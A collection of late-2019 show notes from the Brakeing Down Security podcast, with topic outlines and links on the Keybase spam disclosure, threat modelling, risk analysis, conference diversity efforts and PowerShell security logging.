JB: a major change in social media/generational shift in how we use it, legal or focus on new types of mobile tech for example… Human networking in real-life in the age of ‘social’ ….“When you hire someone… you also hire their rolodex” --- what do you think about this statement? ..it’s role in InfoSec? Talent?
JB- shouted out https://github.com/redcanaryco/atomic-red-team (Invoke-Atomic framework with powershell now on Linux, OSX, and Windows)
JB - Link to hunting/stopping-human-trafficing org i mentioned :
Shoutout
Sherrie Caltagirone, Executive Director, Global Emancipation Network @GblEmancipation
https://www.sans.org/cyber-security-summit/archives/file/summit_archive_1569941622.pdf
Mentioned https://monitorama.com/ https://github.com/viq/air-monitoring-scripts (viq form brake sec )
Other topics
Talk about where you were 10 years ago, and what you did to get where you are?
Best Hacking tool?
Best Enterprise Tool?
Recent news
https://www.phoronix.com/scan.php?page=news_item&px=CERN-MALT-Microsoft-Alternative
https://www.iotworldtoday.com/2019/12/21/2020-predictions-apis-become-a-focus-of-iot-security/
https://www.jonesday.com/en/insights/2018/10/california-to-regulate-security-of-iot-devices
News Stories from 2010 (see if they still make sense, or outdated)
https://www.infosecurity-magazine.com/magazine-features/what-makes-a-ciso-employable/
https://www.owasp.org/index.php/OWASPTop10-2010-PressRelease
Check out our Store on Teepub! https://brakesec.com/store
Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email [email protected]
#Brakesec Store!:https://www.teepublic.com/user/bdspodcast
#Spotify: https://brakesec.com/spotifyBDS
#RSS: https://brakesec.com/BrakesecRSS
#Youtube Channel: http://www.youtube.com/c/BDSPodcast
#iTunes Store Link: https://brakesec.com/BDSiTunes
#Google Play Store: https://brakesec.com/BDS-GooglePlay
Our main site: https://brakesec.com/bdswebsite
#iHeartRadio App: https://brakesec.com/iHeartBrakesec
#SoundCloud: https://brakesec.com/SoundcloudBrakesec
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon
https://brakesec.com/BDSPatreon
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://brakesec.com/BDS-PlayerFM
#Stitcher Network: https://brakesec.com/BrakeSecStitcher
#TuneIn Radio App: https://brakesec.com/TuneInBrakesec
Published on: December 23, 20192019-045-Part 2-Noid, Dave Dittrich, empowered teams, features vs. security
The day after part 1
Keybase halted the spacedrop the day after the first podcast is complete...
Security failures in implementation
“We need to push this to market, we’ll patch it later!”
Risk management discussion for project managers (PMP)
CIA Triad… where does ‘business goals’ fit? Security is at odds with the bottom line
**Reference Noid’s Bsides Seattle talk and podcast earlier this year.**
Other companies that have made security mistakes in the name of business
Practical Pentest Labs storing passwords in the clear
https://twitter.com/mortalhys/status/1202867037120475136
https://web.archive.org/web/20191207132548/https://twitter.com/mortalhys/status/1202867037120475136
https://twitter.com/piaviation/status/1202994484172218368
T-Mobile Austria partial password issues:
https://www.pcmag.com/news/360301/t-mobile-austria-admits-to-storing-passwords-partly-in-clear
No one was championing security, because no one considered the problems with partial disclosure of the passphrase in an account.
Marketing people on your socMedia accounts do NOT help allay security issues (cause they didn’t have escalation procedures for vuln disclosure)
Insider threats could takeover accounts
Follow-up from last week’s show with Bea Hughes:
I liked the interesting docussion about security and DevOps teams with Bea Hughes in your recent podcast. When you mentioned you are taking your PMP for agile I'm surprised you did not mention the term "product owner". You were asking who cares about security that you, as a security guy can talk to. Bea mentioned that it was the "stakeholders", but in the agile process the "product owner" is the team's advocate for the "stakeholders".
And, you also mentioned "PM", as in project manager. In an agile world, the typical PM role is minimized. Actually, the PM is removed entirely ideally in favor of empowered teams. Empowered teams understand that good products are reliable and secure. (Secure because the security CIA includes "availability" and "integrity" aka reliability.)
As Directory of DevOps for my 4,000 persons strong consulting company I'm working with our security team to push responsibility for security to our development teams. Empowering them to take the time and bear the costs of using security tools prior to release and during system operation is what we are working on now, as we roll into 2020.
**If the ‘product owner’ or ‘empowered team’ does not consider security a priority/requirement, then who champions security? It only becomes a priority when something bad happens, like a breach. **
“Empowered teams”
Some people aren’t fans: https://hackernoon.com/the-surprising-misery-of-empowered-teams-35c3679cf11e
Check out our Store on Teepub! https://brakesec.com/store
Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email [email protected]
#Brakesec Store!:https://www.teepublic.com/user/bdspodcast
#Spotify: https://brakesec.com/spotifyBDS
#RSS: https://brakesec.com/BrakesecRSS
#Youtube Channel: http://www.youtube.com/c/BDSPodcast
#iTunes Store Link: https://brakesec.com/BDSiTunes
#Google Play Store: https://brakesec.com/BDS-GooglePlay
Our main site: https://brakesec.com/bdswebsite
#iHeartRadio App: https://brakesec.com/iHeartBrakesec
#SoundCloud: https://brakesec.com/SoundcloudBrakesec
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon
https://brakesec.com/BDSPatreon
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://brakesec.com/BDS-PlayerFM
#Stitcher Network: https://brakesec.com/BrakeSecStitcher
#TuneIn Radio App: https://brakesec.com/TuneInBrakesec
Published on: December 18, 2019
2019-044-Noid and Dave Dittrich discusses recent keybase woes - Part 1
Patreon donor goodness: Scott S. and Ion S.
@_noid_ @davedittrich
Their response:
“it’s not a bug, it’s a feature”
“Don’t write a blog post that will point out the issue”
“You pointing out our issues makes things more difficult for us”
“It’s a free service, why are you hurting us?”
https://keybase.io/docs/bug_reporting
Nov 22nd
Noid (@_noid_) Keybase discussion blog post
https://www.whiskey-tango.org/2019/11/keybase-weve-got-privacy-problem.html
Reddit post showing potential SE attacks occurring: https://www.reddit.com/r/Keybase/comments/e6uou3/hi_guys_i_received_a_message_today_that_is/
Keybase’s decision to fix it came out after The Register asked them about the issue…
Dec 4th
https://keybase.io/blog/dealing-with-spam
Dec 5th.
https://www.theregister.co.uk/2019/12/05/keybase_struggles_with_harassment/
Problems with the implementation:
Requiring admins for Keybase to decide what’s wrong or if they need to be deleted
Additional dummy accounts being created on other sites (keybase, twitter, git, reddit, etc), generating problems for those services (as if Twitter doesn’t have enough issues with bots/shitty people)
Cryptocurrency = trolls/phishing/SE attempts to get folks to hand over their lumens (what’s the motivation of creating the coin?)
They’ve already opened the spam door, and they’ll not be able to shut it.
Once they took the VC and aligned themselves with Stellar, the attack surface changes
From Account takeover (integrity attacks) to deception (social engineering)
What is keybase?
Social network?
E2E chat
Encrypted file share/storage?
CryptoCurrency Company?
Secure git repo protector?
Which ones do they do well?
How could they have solved the spam issue?
Made the cryptocoin a separate application?
Even their /r/keybase is filling up with spammers asking about their Lumens
How could they fix it?
You can’t contact someone unless that person allows you to.
Allow someone to contact you, but do not allow adding to teams without permission
https://news.ycombinator.com/item?id=21719702 (ongoing HN thread)
Noid isn’t the only person with issues in Keybase: https://vicki.substack.com/p/keybase-and-the-chaos-of-crypto
https://keybase.io/docs-assets/blog/NCC_Group_Keybase_KB2018_Public_Report_2019-02-27_v1.3.pdf
Stephen Carter's definition of “integrity.”
Integrity, as I will use the term, requires three steps: (1) discerning what is right and what is wrong, (2) acting on what you have discerned, even at personal cost; and (3) saying openly that you are acting on your understanding of right from wrong.
— Stephen Carter, “Integrity.” Harper-Collins. https://www.harpercollins.com/9780060928070/integrity/
Can the person [who took the controversial act] explain their reasoning, based on principles they can articulate and would follow even if it meant they paid a price? Or do they selectively choose principles in arbitrary ways so as to fit the current circumstances in order to guarantee they get an outcome that benefits them?
noid’s blog post clearly documents the timeline of interactions with Keybase, including: (1) providing detailed steps to reproduce; (2) suggesting mitigations that could be implemented in the architecture; (3) providing guidance to users to protect themselves when the vulnerability disclosure was made public; and (4) justifying his decision to go public by citing and following a vulnerability disclosure policy of a major industry leader in this area, Google:
Following Google Security’s guidelines for issues being actively exploited in the wild, I chose to release this information 7 days after I last heard from Keybase.
The ACM Code of Conduct has several sections that could apply here:
1.1 Contribute to society and to human well-being, acknowledging that all people are stakeholders in computing.
1.2 Avoid harm.
1.6 Respect privacy.
2.1 Strive to achieve high quality in both the processes and products of professional work.
2.7 Foster public awareness and understanding of computing, related technologies, and their consequences.
3.1 Ensure that the public good is the central concern during all professional computing work.
3.7 Recognize and take special care of systems that become integrated into the infrastructure of society.
The right to privacy of your information, as well as the right to choose with whom you associate and communicate, are both arguably duties based on the concept of autonomy (i.e., your right to choose).
In biomedical and behavioral research, the principle involved here is known as Respect for Persons and is best recognized as the idea of informed consent. Giving users autonomy in making their data public, but not giving them autonomy in who they allow to communicate with them and add them to “teams,” could be viewed as conflicting as regards this principle.
This is in fact precisely what noid brought up in his initial communication with Keybase:
I had a random guy I don’t follow add me to a team and start messaging me about cryptocurrency stuff. This really shouldn’t be default behavior. This can result in a spam or harassment vector (hence why I’m reluctant to post it on the open forum). Ideally the default behavior should be that no one can add you to a team without your consent. Then maybe have an option of allowing those you follow to be able to do so, and as a final option let anyone add you to a team (but make sure folks know this isn’t recommended).
Published on: December 10, 20192019-043-Bea Hughes, dealing with realistic threats in your org
Realistic Threats
Nation states aren’t after you
https://twitter.com/beajammingh/status/1191884466752385025
https://twitter.com/beajammingh/status/1198671660150226946
https://twitter.com/beajammingh/status/1198671952824565762
https://www.leviathansecurity.com/blog/the-calculus-of-threat-modeling
What are credible threats?
Malicious insiders -
Non-malicious insiders - https://www.scmagazine.com/home/security-news/not-every-insider-threat-is-malicious-but-all-are-dangerous/
Education issue?
Is there such a thing as ‘non-malicious’ or is this just bunk?
Real threats
https://resources.infosecinstitute.com/5-new-threats-every-organization-prepared-2018/
CIO magazine threats -- buzzword threats (we should totally containerize all the things)
Vulns that have names (blue team is stuck dealing with ‘theoretical’ issues e.g. SPECTRE/MELTDOWN)
Lack of well-priced training?
Dev Training?
Security Training?
Better management communication will reduce threats
Building trust so they don’t freak when ‘$insert_named_vuln’ shows up
Gotta frame it to business needs
“Everyone is vulnerable” - keep FUD to a minimum, don’t exaggerate.
Know your industry’s threats (phishing, money transfer fraud, malware
Patreon donor: Michael K. $10 patron!
Layer8conf - https://www.workshopcon.com/events
https://layer8conference.com/
Regarding diversity scholarships, it's being worked on and the number of available spots will highly depend on the number of Sponsorships the conference secures.
As a side note WorkshopCon will sponsor a number of Layer8 conference tickets if people follow @WorkshopCon on Twitter and tweet to us why they are interested in Social Engineering and OSINT topics with hashtag #sendMeToLayer8. We will select folks from those tweets with the emphasis being on folks coming from underrepresented or minority groups.
In terms of sponsorship information for Layer8, Patrick wants people to send an email to [email protected]
Please let us know if you have any other questions, and thank you so much for giving us a hand spreading the word!!!
Saturday June 6, 2020, RI Convention Center
https://www.dianainitiative.org/
https://twitter.com/DianaInitiative
Conference in Las Vegas (Aug 6-7, 2020) (Thu & Fri)
Check out our Store on Teepub! https://brakesec.com/store
Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email [email protected]
#Brakesec Store!:https://www.teepublic.com/user/bdspodcast
#Spotify: https://brakesec.com/spotifyBDS
#RSS: https://brakesec.com/BrakesecRSS
#Youtube Channel: http://www.youtube.com/c/BDSPodcast
#iTunes Store Link: https://brakesec.com/BDSiTunes
#Google Play Store: https://brakesec.com/BDS-GooglePlay
Our main site: https://brakesec.com/bdswebsite
#iHeartRadio App: https://brakesec.com/iHeartBrakesec
#SoundCloud: https://brakesec.com/SoundcloudBrakesec
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon
https://brakesec.com/BDSPatreon
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://brakesec.com/BDS-PlayerFM
#Stitcher Network: https://brakesec.com/BrakeSecStitcher
#TuneIn Radio App: https://brakesec.com/TuneInBrakesec
Published on: December 4, 20192019-042-CircuitSwan, Gitlabs, Job descriptions that don't suck, layer8con
Diana Initiative
@circuitswan @dianainitiative
https://www.dianainitiative.org/
https://twitter.com/DianaInitiative
Conference in Las Vegas (Aug 6-7, 2020) (Thu & Fri)
Topics
- Diana initiatives
-
- Past
-
- 2015 - idea at defcon 23
- 2016-17-18 growing but got too big!
- 2019 got our own space, ~800 tickets
- 2020 plans-westin again, 2 speaking tracks and 1 workshop track, solder village, career village, CTF, lock picking
- Mentoring both CFP and presenters this year! (expansion from last year)
- student scholarship (we want to double the amount of money, target still 10)
- Free tickets (expansion over last year)
- Present
- Slogan contest 2020
- I don’t want to think about 2021 yet :)
- Future
- Mentors
- Reviewers
- Volunteers
- Donations (giving tuesday, scholarships)
- Needs/wants
- Discuss how to add more DNI into your event (conference, meetup, slack, etc)
-
- https://business.linkedin.com/talent-solutions/blog/job-descriptions/2018/5-must-dos-for-writing-inclusive-job-descriptions
- https://www.hudsonrpo.com/rpo-intelligence/recruitment-process-outsourcing/how-to-write-an-inclusive-job-description/
- https://www.refinery29.com/en-us/2017/04/148547/how-to-get-a-raise-chatbot-cindy-gallop
- Better job descriptions
- Other topics of interests
- Career village / resume clinic work in general (spoken on this twice, volunteer at resume clinic)
- CFP advice in general (https://sites.google.com/site/amazonv/conference-call-for-papers-cfp-tips )
- First time speaker advice in general https://sites.google.com/site/amazonv/first-time-speaker?authuser=0
- HackerSwan (http://hackerswan.com/ )
- HackerFoodies (http://hackerfoodies.com/ )
- http://hackersummercamp.guide/ aka “birds of a feather concept”
- WAN party / Women’s meetup at Defcon with @sylv3on_ @nemessisc and more
- GitLab security scans (that's me!)
- We are responsible for baking Sec into DevOps and hence write the red team software (well integrate in most cases) for your appsec team if your devs are using GitLab. We have a security team that secures GitLab itself but that's not us. We have SAST, DAST, Dependency, Secret Detection and License Compliance baked into our paid tier, and SAST is coming down to the free tier! I’m pitching a talk about tuning to shmoocon because it seems like that's the most common question I got as a result of my devsecops talks at derbycon / shellcon / bsidesdc.
- Also could mention getting married to RenderMan and the open wedding invite we have if you are up for party shenanigans http://circuitswanandrenderman.com/
- And i have a help guide for how to run an inclusive conference - https://docs.google.com/document/d/12OCiiWRVf6r08SuI3T4Djm98GwkfzlvhjYNpS225x3M/edit
2019 ShellCon Tuneup Tips for Your CV and Profile, From an Interviewer
SE Village Con - Thu, Feb 20 - Sat, Feb 22 | Hilton Orlando Buena Vista Palace
Layer8conf - https://www.workshopcon.com/events
https://layer8conference.com/
Regarding diversity scholarships, it's being worked on and the number of available spots will highly depend on the number of Sponsorships the conference secures.
As a side note WorkshopCon will sponsor a number of Layer8 conference tickets if people follow @WorkshopCon on Twitter and tweet to us why they are interested in Social Engineering and OSINT topics with hashtag #sendMeToLayer8. We will select folks from those tweets with the emphasis being on folks coming from underrepresented or minority groups.
In terms of sponsorship information for Layer8, Patrick wants people to send an email to [email protected]
Please let us know if you have any other questions, and thank you so much for giving us a hand spreading the word!!!
Saturday June 6, 2020, RI Convention Center
Check out our Store on Teepub! https://brakesec.com/store
Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email [email protected]
#Brakesec Store!:https://www.teepublic.com/user/bdspodcast
#Spotify: https://brakesec.com/spotifyBDS
#RSS: https://brakesec.com/BrakesecRSS
#Youtube Channel: http://www.youtube.com/c/BDSPodcast
#iTunes Store Link: https://brakesec.com/BDSiTunes
#Google Play Store: https://brakesec.com/BDS-GooglePlay
Our main site: https://brakesec.com/bdswebsite
#iHeartRadio App: https://brakesec.com/iHeartBrakesec
#SoundCloud: https://brakesec.com/SoundcloudBrakesec
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon
https://brakesec.com/BDSPatreon
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://brakesec.com/BDS-PlayerFM
#Stitcher Network: https://brakesec.com/BrakeSecStitcher
#TuneIn Radio App: https://brakesec.com/TuneInBrakesec
Published on: November 27, 20192019-041-circuitswan, diana initiative, diversity initiatives at conferences
Diana Initiative
@circuitswan
https://www.dianainitiative.org/
https://twitter.com/DianaInitiative
Conference in Las Vegas (Aug 6-7, 2020) (Thu & Fri)
Topics
- Diana initiatives
-
- Past
-
- 2015 - idea at defcon 23
- 2016-17-18 growing but got too big!
- 2019 got our own space, ~800 tickets
- 2020 plans-westin again, 2 speaking tracks and 1 workshop track, solder village, career village, CTF, lock picking
- Mentoring both CFP and presenters this year! (expansion from last year)
- student scholarship (we want to double the amount of money, target still 10)
- Free tickets (expansion over last year)
- Present
- Slogan contest 2020
- I don’t want to think about 2021 yet :)
- Future
- Mentors
- Reviewers
- Volunteers
- Donations (giving tuesday, scholarships)
- Needs/wants
- Discuss how to add more DNI into your event (conference, meetup, slack, etc)
-
- https://business.linkedin.com/talent-solutions/blog/job-descriptions/2018/5-must-dos-for-writing-inclusive-job-descriptions
- https://www.hudsonrpo.com/rpo-intelligence/recruitment-process-outsourcing/how-to-write-an-inclusive-job-description/
- https://www.refinery29.com/en-us/2017/04/148547/how-to-get-a-raise-chatbot-cindy-gallop
- Better job descriptions
- Other topics of interests
- Career village / resume clinic work in general (spoken on this twice, volunteer at resume clinic)
- CFP advice in general (https://sites.google.com/site/amazonv/conference-call-for-papers-cfp-tips )
- First time speaker advice in general https://sites.google.com/site/amazonv/first-time-speaker?authuser=0
- HackerSwan (http://hackerswan.com/ )
- HackerFoodies (http://hackerfoodies.com/ )
- http://hackersummercamp.guide/ aka “birds of a feather concept”
- WAN party / Women’s meetup at Defcon with @sylv3on_ @nemessisc and more
- GitLab security scans (that's me!)
- We are responsible for baking Sec into DevOps and hence write the red team software (well integrate in most cases) for your appsec team if your devs are using GitLab. We have a security team that secures GitLab itself but that's not us. We have SAST, DAST, Dependency, Secret Detection and License Compliance baked into our paid tier, and SAST is coming down to the free tier! I’m pitching a talk about tuning to shmoocon because it seems like that's the most common question I got as a result of my devsecops talks at derbycon / shellcon / bsidesdc.
- Also could mention getting married to RenderMan and the open wedding invite we have if you are up for party shenanigans http://circuitswanandrenderman.com/
- And i have a help guide for how to run an inclusive conference - https://docs.google.com/document/d/12OCiiWRVf6r08SuI3T4Djm98GwkfzlvhjYNpS225x3M/edit
2019 ShellCon Tuneup Tips for Your CV and Profile, From an Interviewer
SE Village Con - Thu, Feb 20 - Sat, Feb 22 | Hilton Orlando Buena Vista Palace
Layer8conf - https://www.workshopcon.com/events
https://layer8conference.com/
Regarding diversity scholarships, it's being worked on and the number of available spots will highly depend on the number of Sponsorships the conference secures.
As a side note WorkshopCon will sponsor a number of Layer8 conference tickets if people follow @WorkshopCon on Twitter and tweet to us why they are interested in Social Engineering and OSINT topics with hashtag #sendMeToLayer8. We will select folks from those tweets with the emphasis being on folks coming from underrepresented or minority groups.
In terms of sponsorship information for Layer8, Patrick wants people to send an email to [email protected]
Please let us know if you have any other questions, and thank you so much for giving us a hand spreading the word!!!
Saturday June 6, 2020, RI Convention Center
Check out our Store on Teepub! https://brakesec.com/store
Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email [email protected]
#Brakesec Store!:https://www.teepublic.com/user/bdspodcast
#Spotify: https://brakesec.com/spotifyBDS
#RSS: https://brakesec.com/BrakesecRSS
#Youtube Channel: http://www.youtube.com/c/BDSPodcast
#iTunes Store Link: https://brakesec.com/BDSiTunes
#Google Play Store: https://brakesec.com/BDS-GooglePlay
Our main site: https://brakesec.com/bdswebsite
#iHeartRadio App: https://brakesec.com/iHeartBrakesec
#SoundCloud: https://brakesec.com/SoundcloudBrakesec
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon
https://brakesec.com/BDSPatreon
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://brakesec.com/BDS-PlayerFM
#Stitcher Network: https://brakesec.com/BrakeSecStitcher
#TuneIn Radio App: https://brakesec.com/TuneInBrakesec
Published on: November 21, 20192019-040-vulns in cisco kit, google's project 'nightmare', healthcare data issues, TAGNW conference update
Tagnw.org
Amazon Smile - brakesec.com/smile
News:
https://www.androidpolice.com/2019/11/11/google-project-nightingale-health-records-collection/
https://blog.naijasecforce.com/the-jar-based-malware/ - ms. Infosecsherpa mailing list “nuzzle”
https://blog.ropnop.com/extracting-ssh-private-keys-from-windows-10-ssh-agent/
https://en.wikipedia.org/wiki/Data_Protection_API
https://www.routefifty.com/tech-data/2019/11/plan-engage-hackers-election-security/161045/
Check out our Store on Teepub! https://brakesec.com/store
Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email [email protected]
#Brakesec Store!:https://www.teepublic.com/user/bdspodcast
#Spotify: https://brakesec.com/spotifyBDS
#RSS: https://brakesec.com/BrakesecRSS
#Youtube Channel: http://www.youtube.com/c/BDSPodcast
#iTunes Store Link: https://brakesec.com/BDSiTunes
#Google Play Store: https://brakesec.com/BDS-GooglePlay
Our main site: https://brakesec.com/bdswebsite
#iHeartRadio App: https://brakesec.com/iHeartBrakesec
#SoundCloud: https://brakesec.com/SoundcloudBrakesec
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon
https://brakesec.com/BDSPatreon
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://brakesec.com/BDS-PlayerFM
#Stitcher Network: https://brakesec.com/BrakeSecStitcher
#TuneIn Radio App: https://brakesec.com/TuneInBrakesec
Published on: November 12, 20192019-039-bluekeep_weaponized-npm_security_cracks-grrcon_report
Grrcon update
2019-039- bluekeep Weaponized… and more
Bluekeep weaponized
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708
https://www.microsoft.com/security/blog/2019/08/08/protect-against-bluekeep/
https://www.wired.com/story/bluekeep-hacking-cryptocurrency-mining
NordVPN hacked: https://arstechnica.com/information-technology/2019/11/nordvpn-users-passwords-exposed-in-mass-credential-stuffing-attacks/
Null sessions and how to avoid them:
https://www.dummies.com/programming/networking/null-session-attacks-and-how-to-avoid-them/
Linux has a marketing problem:
https://hackaday.com/2019/10/31/linuxs-marketing-problem/
20 accounts could pwn majority of NPM
Chrome 0day
https://thehackernews.com/2019/11/chrome-zero-day-update.html
India Nuclear plant is hacked
High Tea Security Podcast:
https://www.podcasts.com/high-tea-security-190182dc8
https://TAGNW.org - Bryan
Panel and talking about networking
Securewv.org - Training - https://www.eventbrite.com/e/security-dd-tickets-79219348203
Bsides Fredericton - https://www.eventbrite.ca/e/security-bsides-fredericton-2019-tickets-59449704667
Check out our Store on Teepub! https://brakesec.com/store
Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email [email protected]
#Brakesec Store!:https://www.teepublic.com/user/bdspodcast
#Spotify: https://brakesec.com/spotifyBDS
#RSS: https://brakesec.com/BrakesecRSS
#Youtube Channel: http://www.youtube.com/c/BDSPodcast
#iTunes Store Link: https://brakesec.com/BDSiTunes
#Google Play Store: https://brakesec.com/BDS-GooglePlay
Our main site: https://brakesec.com/bdswebsite
#iHeartRadio App: https://brakesec.com/iHeartBrakesec
#SoundCloud: https://brakesec.com/SoundcloudBrakesec
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon
https://brakesec.com/BDSPatreon
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://brakesec.com/BDS-PlayerFM
#Stitcher Network: https://brakesec.com/BrakeSecStitcher
#TuneIn Radio App: https://brakesec.com/TuneInBrakesec
Published on: November 4, 20192019-038-Deveeshree_Nayak-risk_analysis, and OWASP WIA
OWASP WIA - https://www.youtube.com/watch?v=umnt0qbOPsE
https://www.owasp.org/index.php/Women_In_AppSec
OWASP Women in AppSec
Twitter: 2013_Nayak (reach and ask to be added)
Risk in Infosec
Risk - a situation which involves extreme danger and extensive amount of unrecovered loss
What about risks that are positive in nature? PMP calls them ‘opportunities’
Risk Analysis - systemic examination of the components and characteristics of risk
Analysis Steps -
Understanding and Assessment
Understand there is a risk
What if a company does not have security standards?
Identification
Identify and categorize risk -
Informational risk
Network risk
Hardware risk
Software risk
Environment risk?
https://en.wikipedia.org/wiki/Routine_activity_theory
Scope of risk analysis?
Threat modeling to find risks?
https://www.leviathansecurity.com/blog/the-calculus-of-threat-modeling
SWOT (strength/weakness/opportunities/threats) analysis will discover risks?
Risk analysis methodologies?
https://www.project-risk-manager.com/blog/qualitative-risk-techniques/
https://securityscorecard.com/blog/it-security-risk-assessment-methodology
https://en.wikipedia.org/wiki/Probabilistic_risk_assessment
https://en.wikipedia.org/wiki/Capability_Maturity_Model_Integration
Estimation
Chance that risk will occur (once a decade, once a week)
Design controls to remediate
Implementation
Risk assessment is a combined approach
Combined approach for a risk analysis
You mentioned a lot of people, what’s the scope?
How do you do the risk assessment? Framework?
Evaluation
Evaluation approach
Like an agile approach
Provides an informed conclusion
Report must be clear (no jargon)
Decision Making
Examples to Reduce Risk
Training and education
what kind of testing? Annual Security training?
Publishing policies
Agreement with organization
BAA with 3rd parties
Timely testing -
Published on: October 30, 2019
2019-038- Ethical dilemmas with offensive tools, powershell discussion with Lee Holmes - Part2
Derbycon9 talk - PowerShell Security Looking Back from the Inside - https://www.youtube.com/watch?v=DYWPtt7qszY&list=PLNhlcxQZJSm_ZDJBksg97I5q1XsdQcyN5&index=27&t=0s
Encarta - https://en.wikipedia.org/wiki/Encarta
Scott Hanselman’s twitter thread about Encarta: https://twitter.com/shanselman/status/1158780839464849409
Congrats on the black badge :)
I like that you bring up execution policies. That it was never created to become a security control
- I started alerting on it anyway at least from non-admin devices
https://www.mssqltips.com/sqlservertip/2702/setting-the-powershell-execution-policy/
Want to learn Powershell? UnderTheWire wargame: https://underthewire.tech/
Jeffrey Snover “The Cultural battle to remove Windows from Windows Server”: https://www.youtube.com/watch?v=3Uvq38XOark
You talk about “why would anyone want to remove powershell” as it came as a standalone download and part of the windows sdk. - I was taught when I was just getting into tech, that I should fear powershell and didn’t realize how powerful it could be as an admin because of it.
Powershell slime trail <3 (powershell transparency)
“You can’t force a powerful tool only to be used how you want it to be used, you can tilt the playing field on behalf of defenders”
If an attacker is going to use powershell, let’s make them regret it
Powershell has had quite an impact and history.
My own sorry logging/alerting attempts
You mentioned the amount of attacks listed in MITRE that use powershell, is that *the* recommended resource for blue teamers, are there any others?
Revoke-Obfuscation white paper (blackhat2017): https://www.blackhat.com/docs/us-17/thursday/us-17-Bohannon-Revoke-Obfuscation-PowerShell-Obfuscation-Detection-And%20Evasion-Using-Science-wp.pdf
https://github.com/danielbohannon/Invoke-Obfuscation
https://github.com/danielbohannon/Revoke-Obfuscation
https://blog.trendmicro.com/trendlabs-security-intelligence/ransomware-now-uses-windows-powershell/
https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/TROJ_POSHCODER.A
Ever thought of writing a powershell security sentric book? Bill Pollock was looking for someone to write a book for NoStarch…
Derbycon keynote with Lee Holmes and Jeffrey Snover - http://www.irongeek.com/i.php?page=videos/derbycon6/101-key-note-jeffrey-snover-lee-holmes
AMSI - Antimalware Scan Interface: https://docs.microsoft.com/en-us/windows/win32/amsi/antimalware-scan-interface-portal
https://www.amazon.com/dp/B00ARN9MEK/ref=dp-kindle-redirect?_encoding=UTF8&btkr=1 - Windows Powershell cookbook
Eric conrad: https://www.ericconrad.com/2016/09/deepbluecli-powershell-module-for-hunt.html
https://github.com/sans-blue-team/DeepBlueCLI
Daniel Bohannon - DevSec Defense - https://www.youtube.com/watch?v=QJe8xikf-iE
https://github.com/psconfeu/2018/tree/master/Daniel%20Bohannon/DevSec%20Defense
Constrained language mode: https://devblogs.microsoft.com/powershell/powershell-constrained-language-mode/
Maslow’s security Hierarchy: https://www.leeholmes.com/blog/2014/12/08/maslows-hierarchy-of-security-controls/
Just Enough Administration: https://docs.microsoft.com/en-us/previous-versions//dn896648(v=technet.10)?redirectedfrom=MSDN
https://github.com/infosecn1nja/AD-Attack-Defense -
Also - DrawOnMyBadge.com - Super cool idea, loved the mona lisa
@Lee_Holmes
@hackershealth
@log-md
@infosecCampout
@seasecEast
@brakesec
@bryanbrake
@boettcherpwned
@Infosystir
@packscott
@dpcybuck
@megan_roddie
@consultingCSO
Published on: October 22, 2019
2019-037-Lee Holmes, Powershell logging, and why there's an 'execution bypass'
Derbycon9 talk - PowerShell Security Looking Back from the Inside - https://www.youtube.com/watch?v=DYWPtt7qszY&list=PLNhlcxQZJSm_ZDJBksg97I5q1XsdQcyN5&index=27&t=0s
Encarta - https://en.wikipedia.org/wiki/Encarta
Scott Hanselman’s twitter thread about Encarta: https://twitter.com/shanselman/status/1158780839464849409
Congrats on the black badge :)
I like that you bring up execution policies. That it was never created to become a security control
- I started alerting on it anyway at least from non-admin devices
https://www.mssqltips.com/sqlservertip/2702/setting-the-powershell-execution-policy/
Want to learn Powershell? UnderTheWire wargame: https://underthewire.tech/
Jeffrey Snover “The Cultural battle to remove Windows from Windows Server”: https://www.youtube.com/watch?v=3Uvq38XOark
You talk about “why would anyone want to remove powershell” as it came as a standalone download and part of the windows sdk. - I was taught when I was just getting into tech, that I should fear powershell and didn’t realize how powerful it could be as an admin because of it.
Powershell slime trail <3 (powershell transparency)
“You can’t force a powerful tool only to be used how you want it to be used, you can tilt the playing field on behalf of defenders”
If an attacker is going to use powershell, let’s make them regret it
Powershell has had quite an impact and history.
My own sorry logging/alerting attempts
You mentioned the amount of attacks listed in MITRE that use powershell, is that *the* recommended resource for blue teamers, are there any others?
Revoke-Obfuscation white paper (blackhat2017): https://www.blackhat.com/docs/us-17/thursday/us-17-Bohannon-Revoke-Obfuscation-PowerShell-Obfuscation-Detection-And%20Evasion-Using-Science-wp.pdf
https://github.com/danielbohannon/Invoke-Obfuscation
https://github.com/danielbohannon/Revoke-Obfuscation
https://blog.trendmicro.com/trendlabs-security-intelligence/ransomware-now-uses-windows-powershell/
https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/TROJ_POSHCODER.A
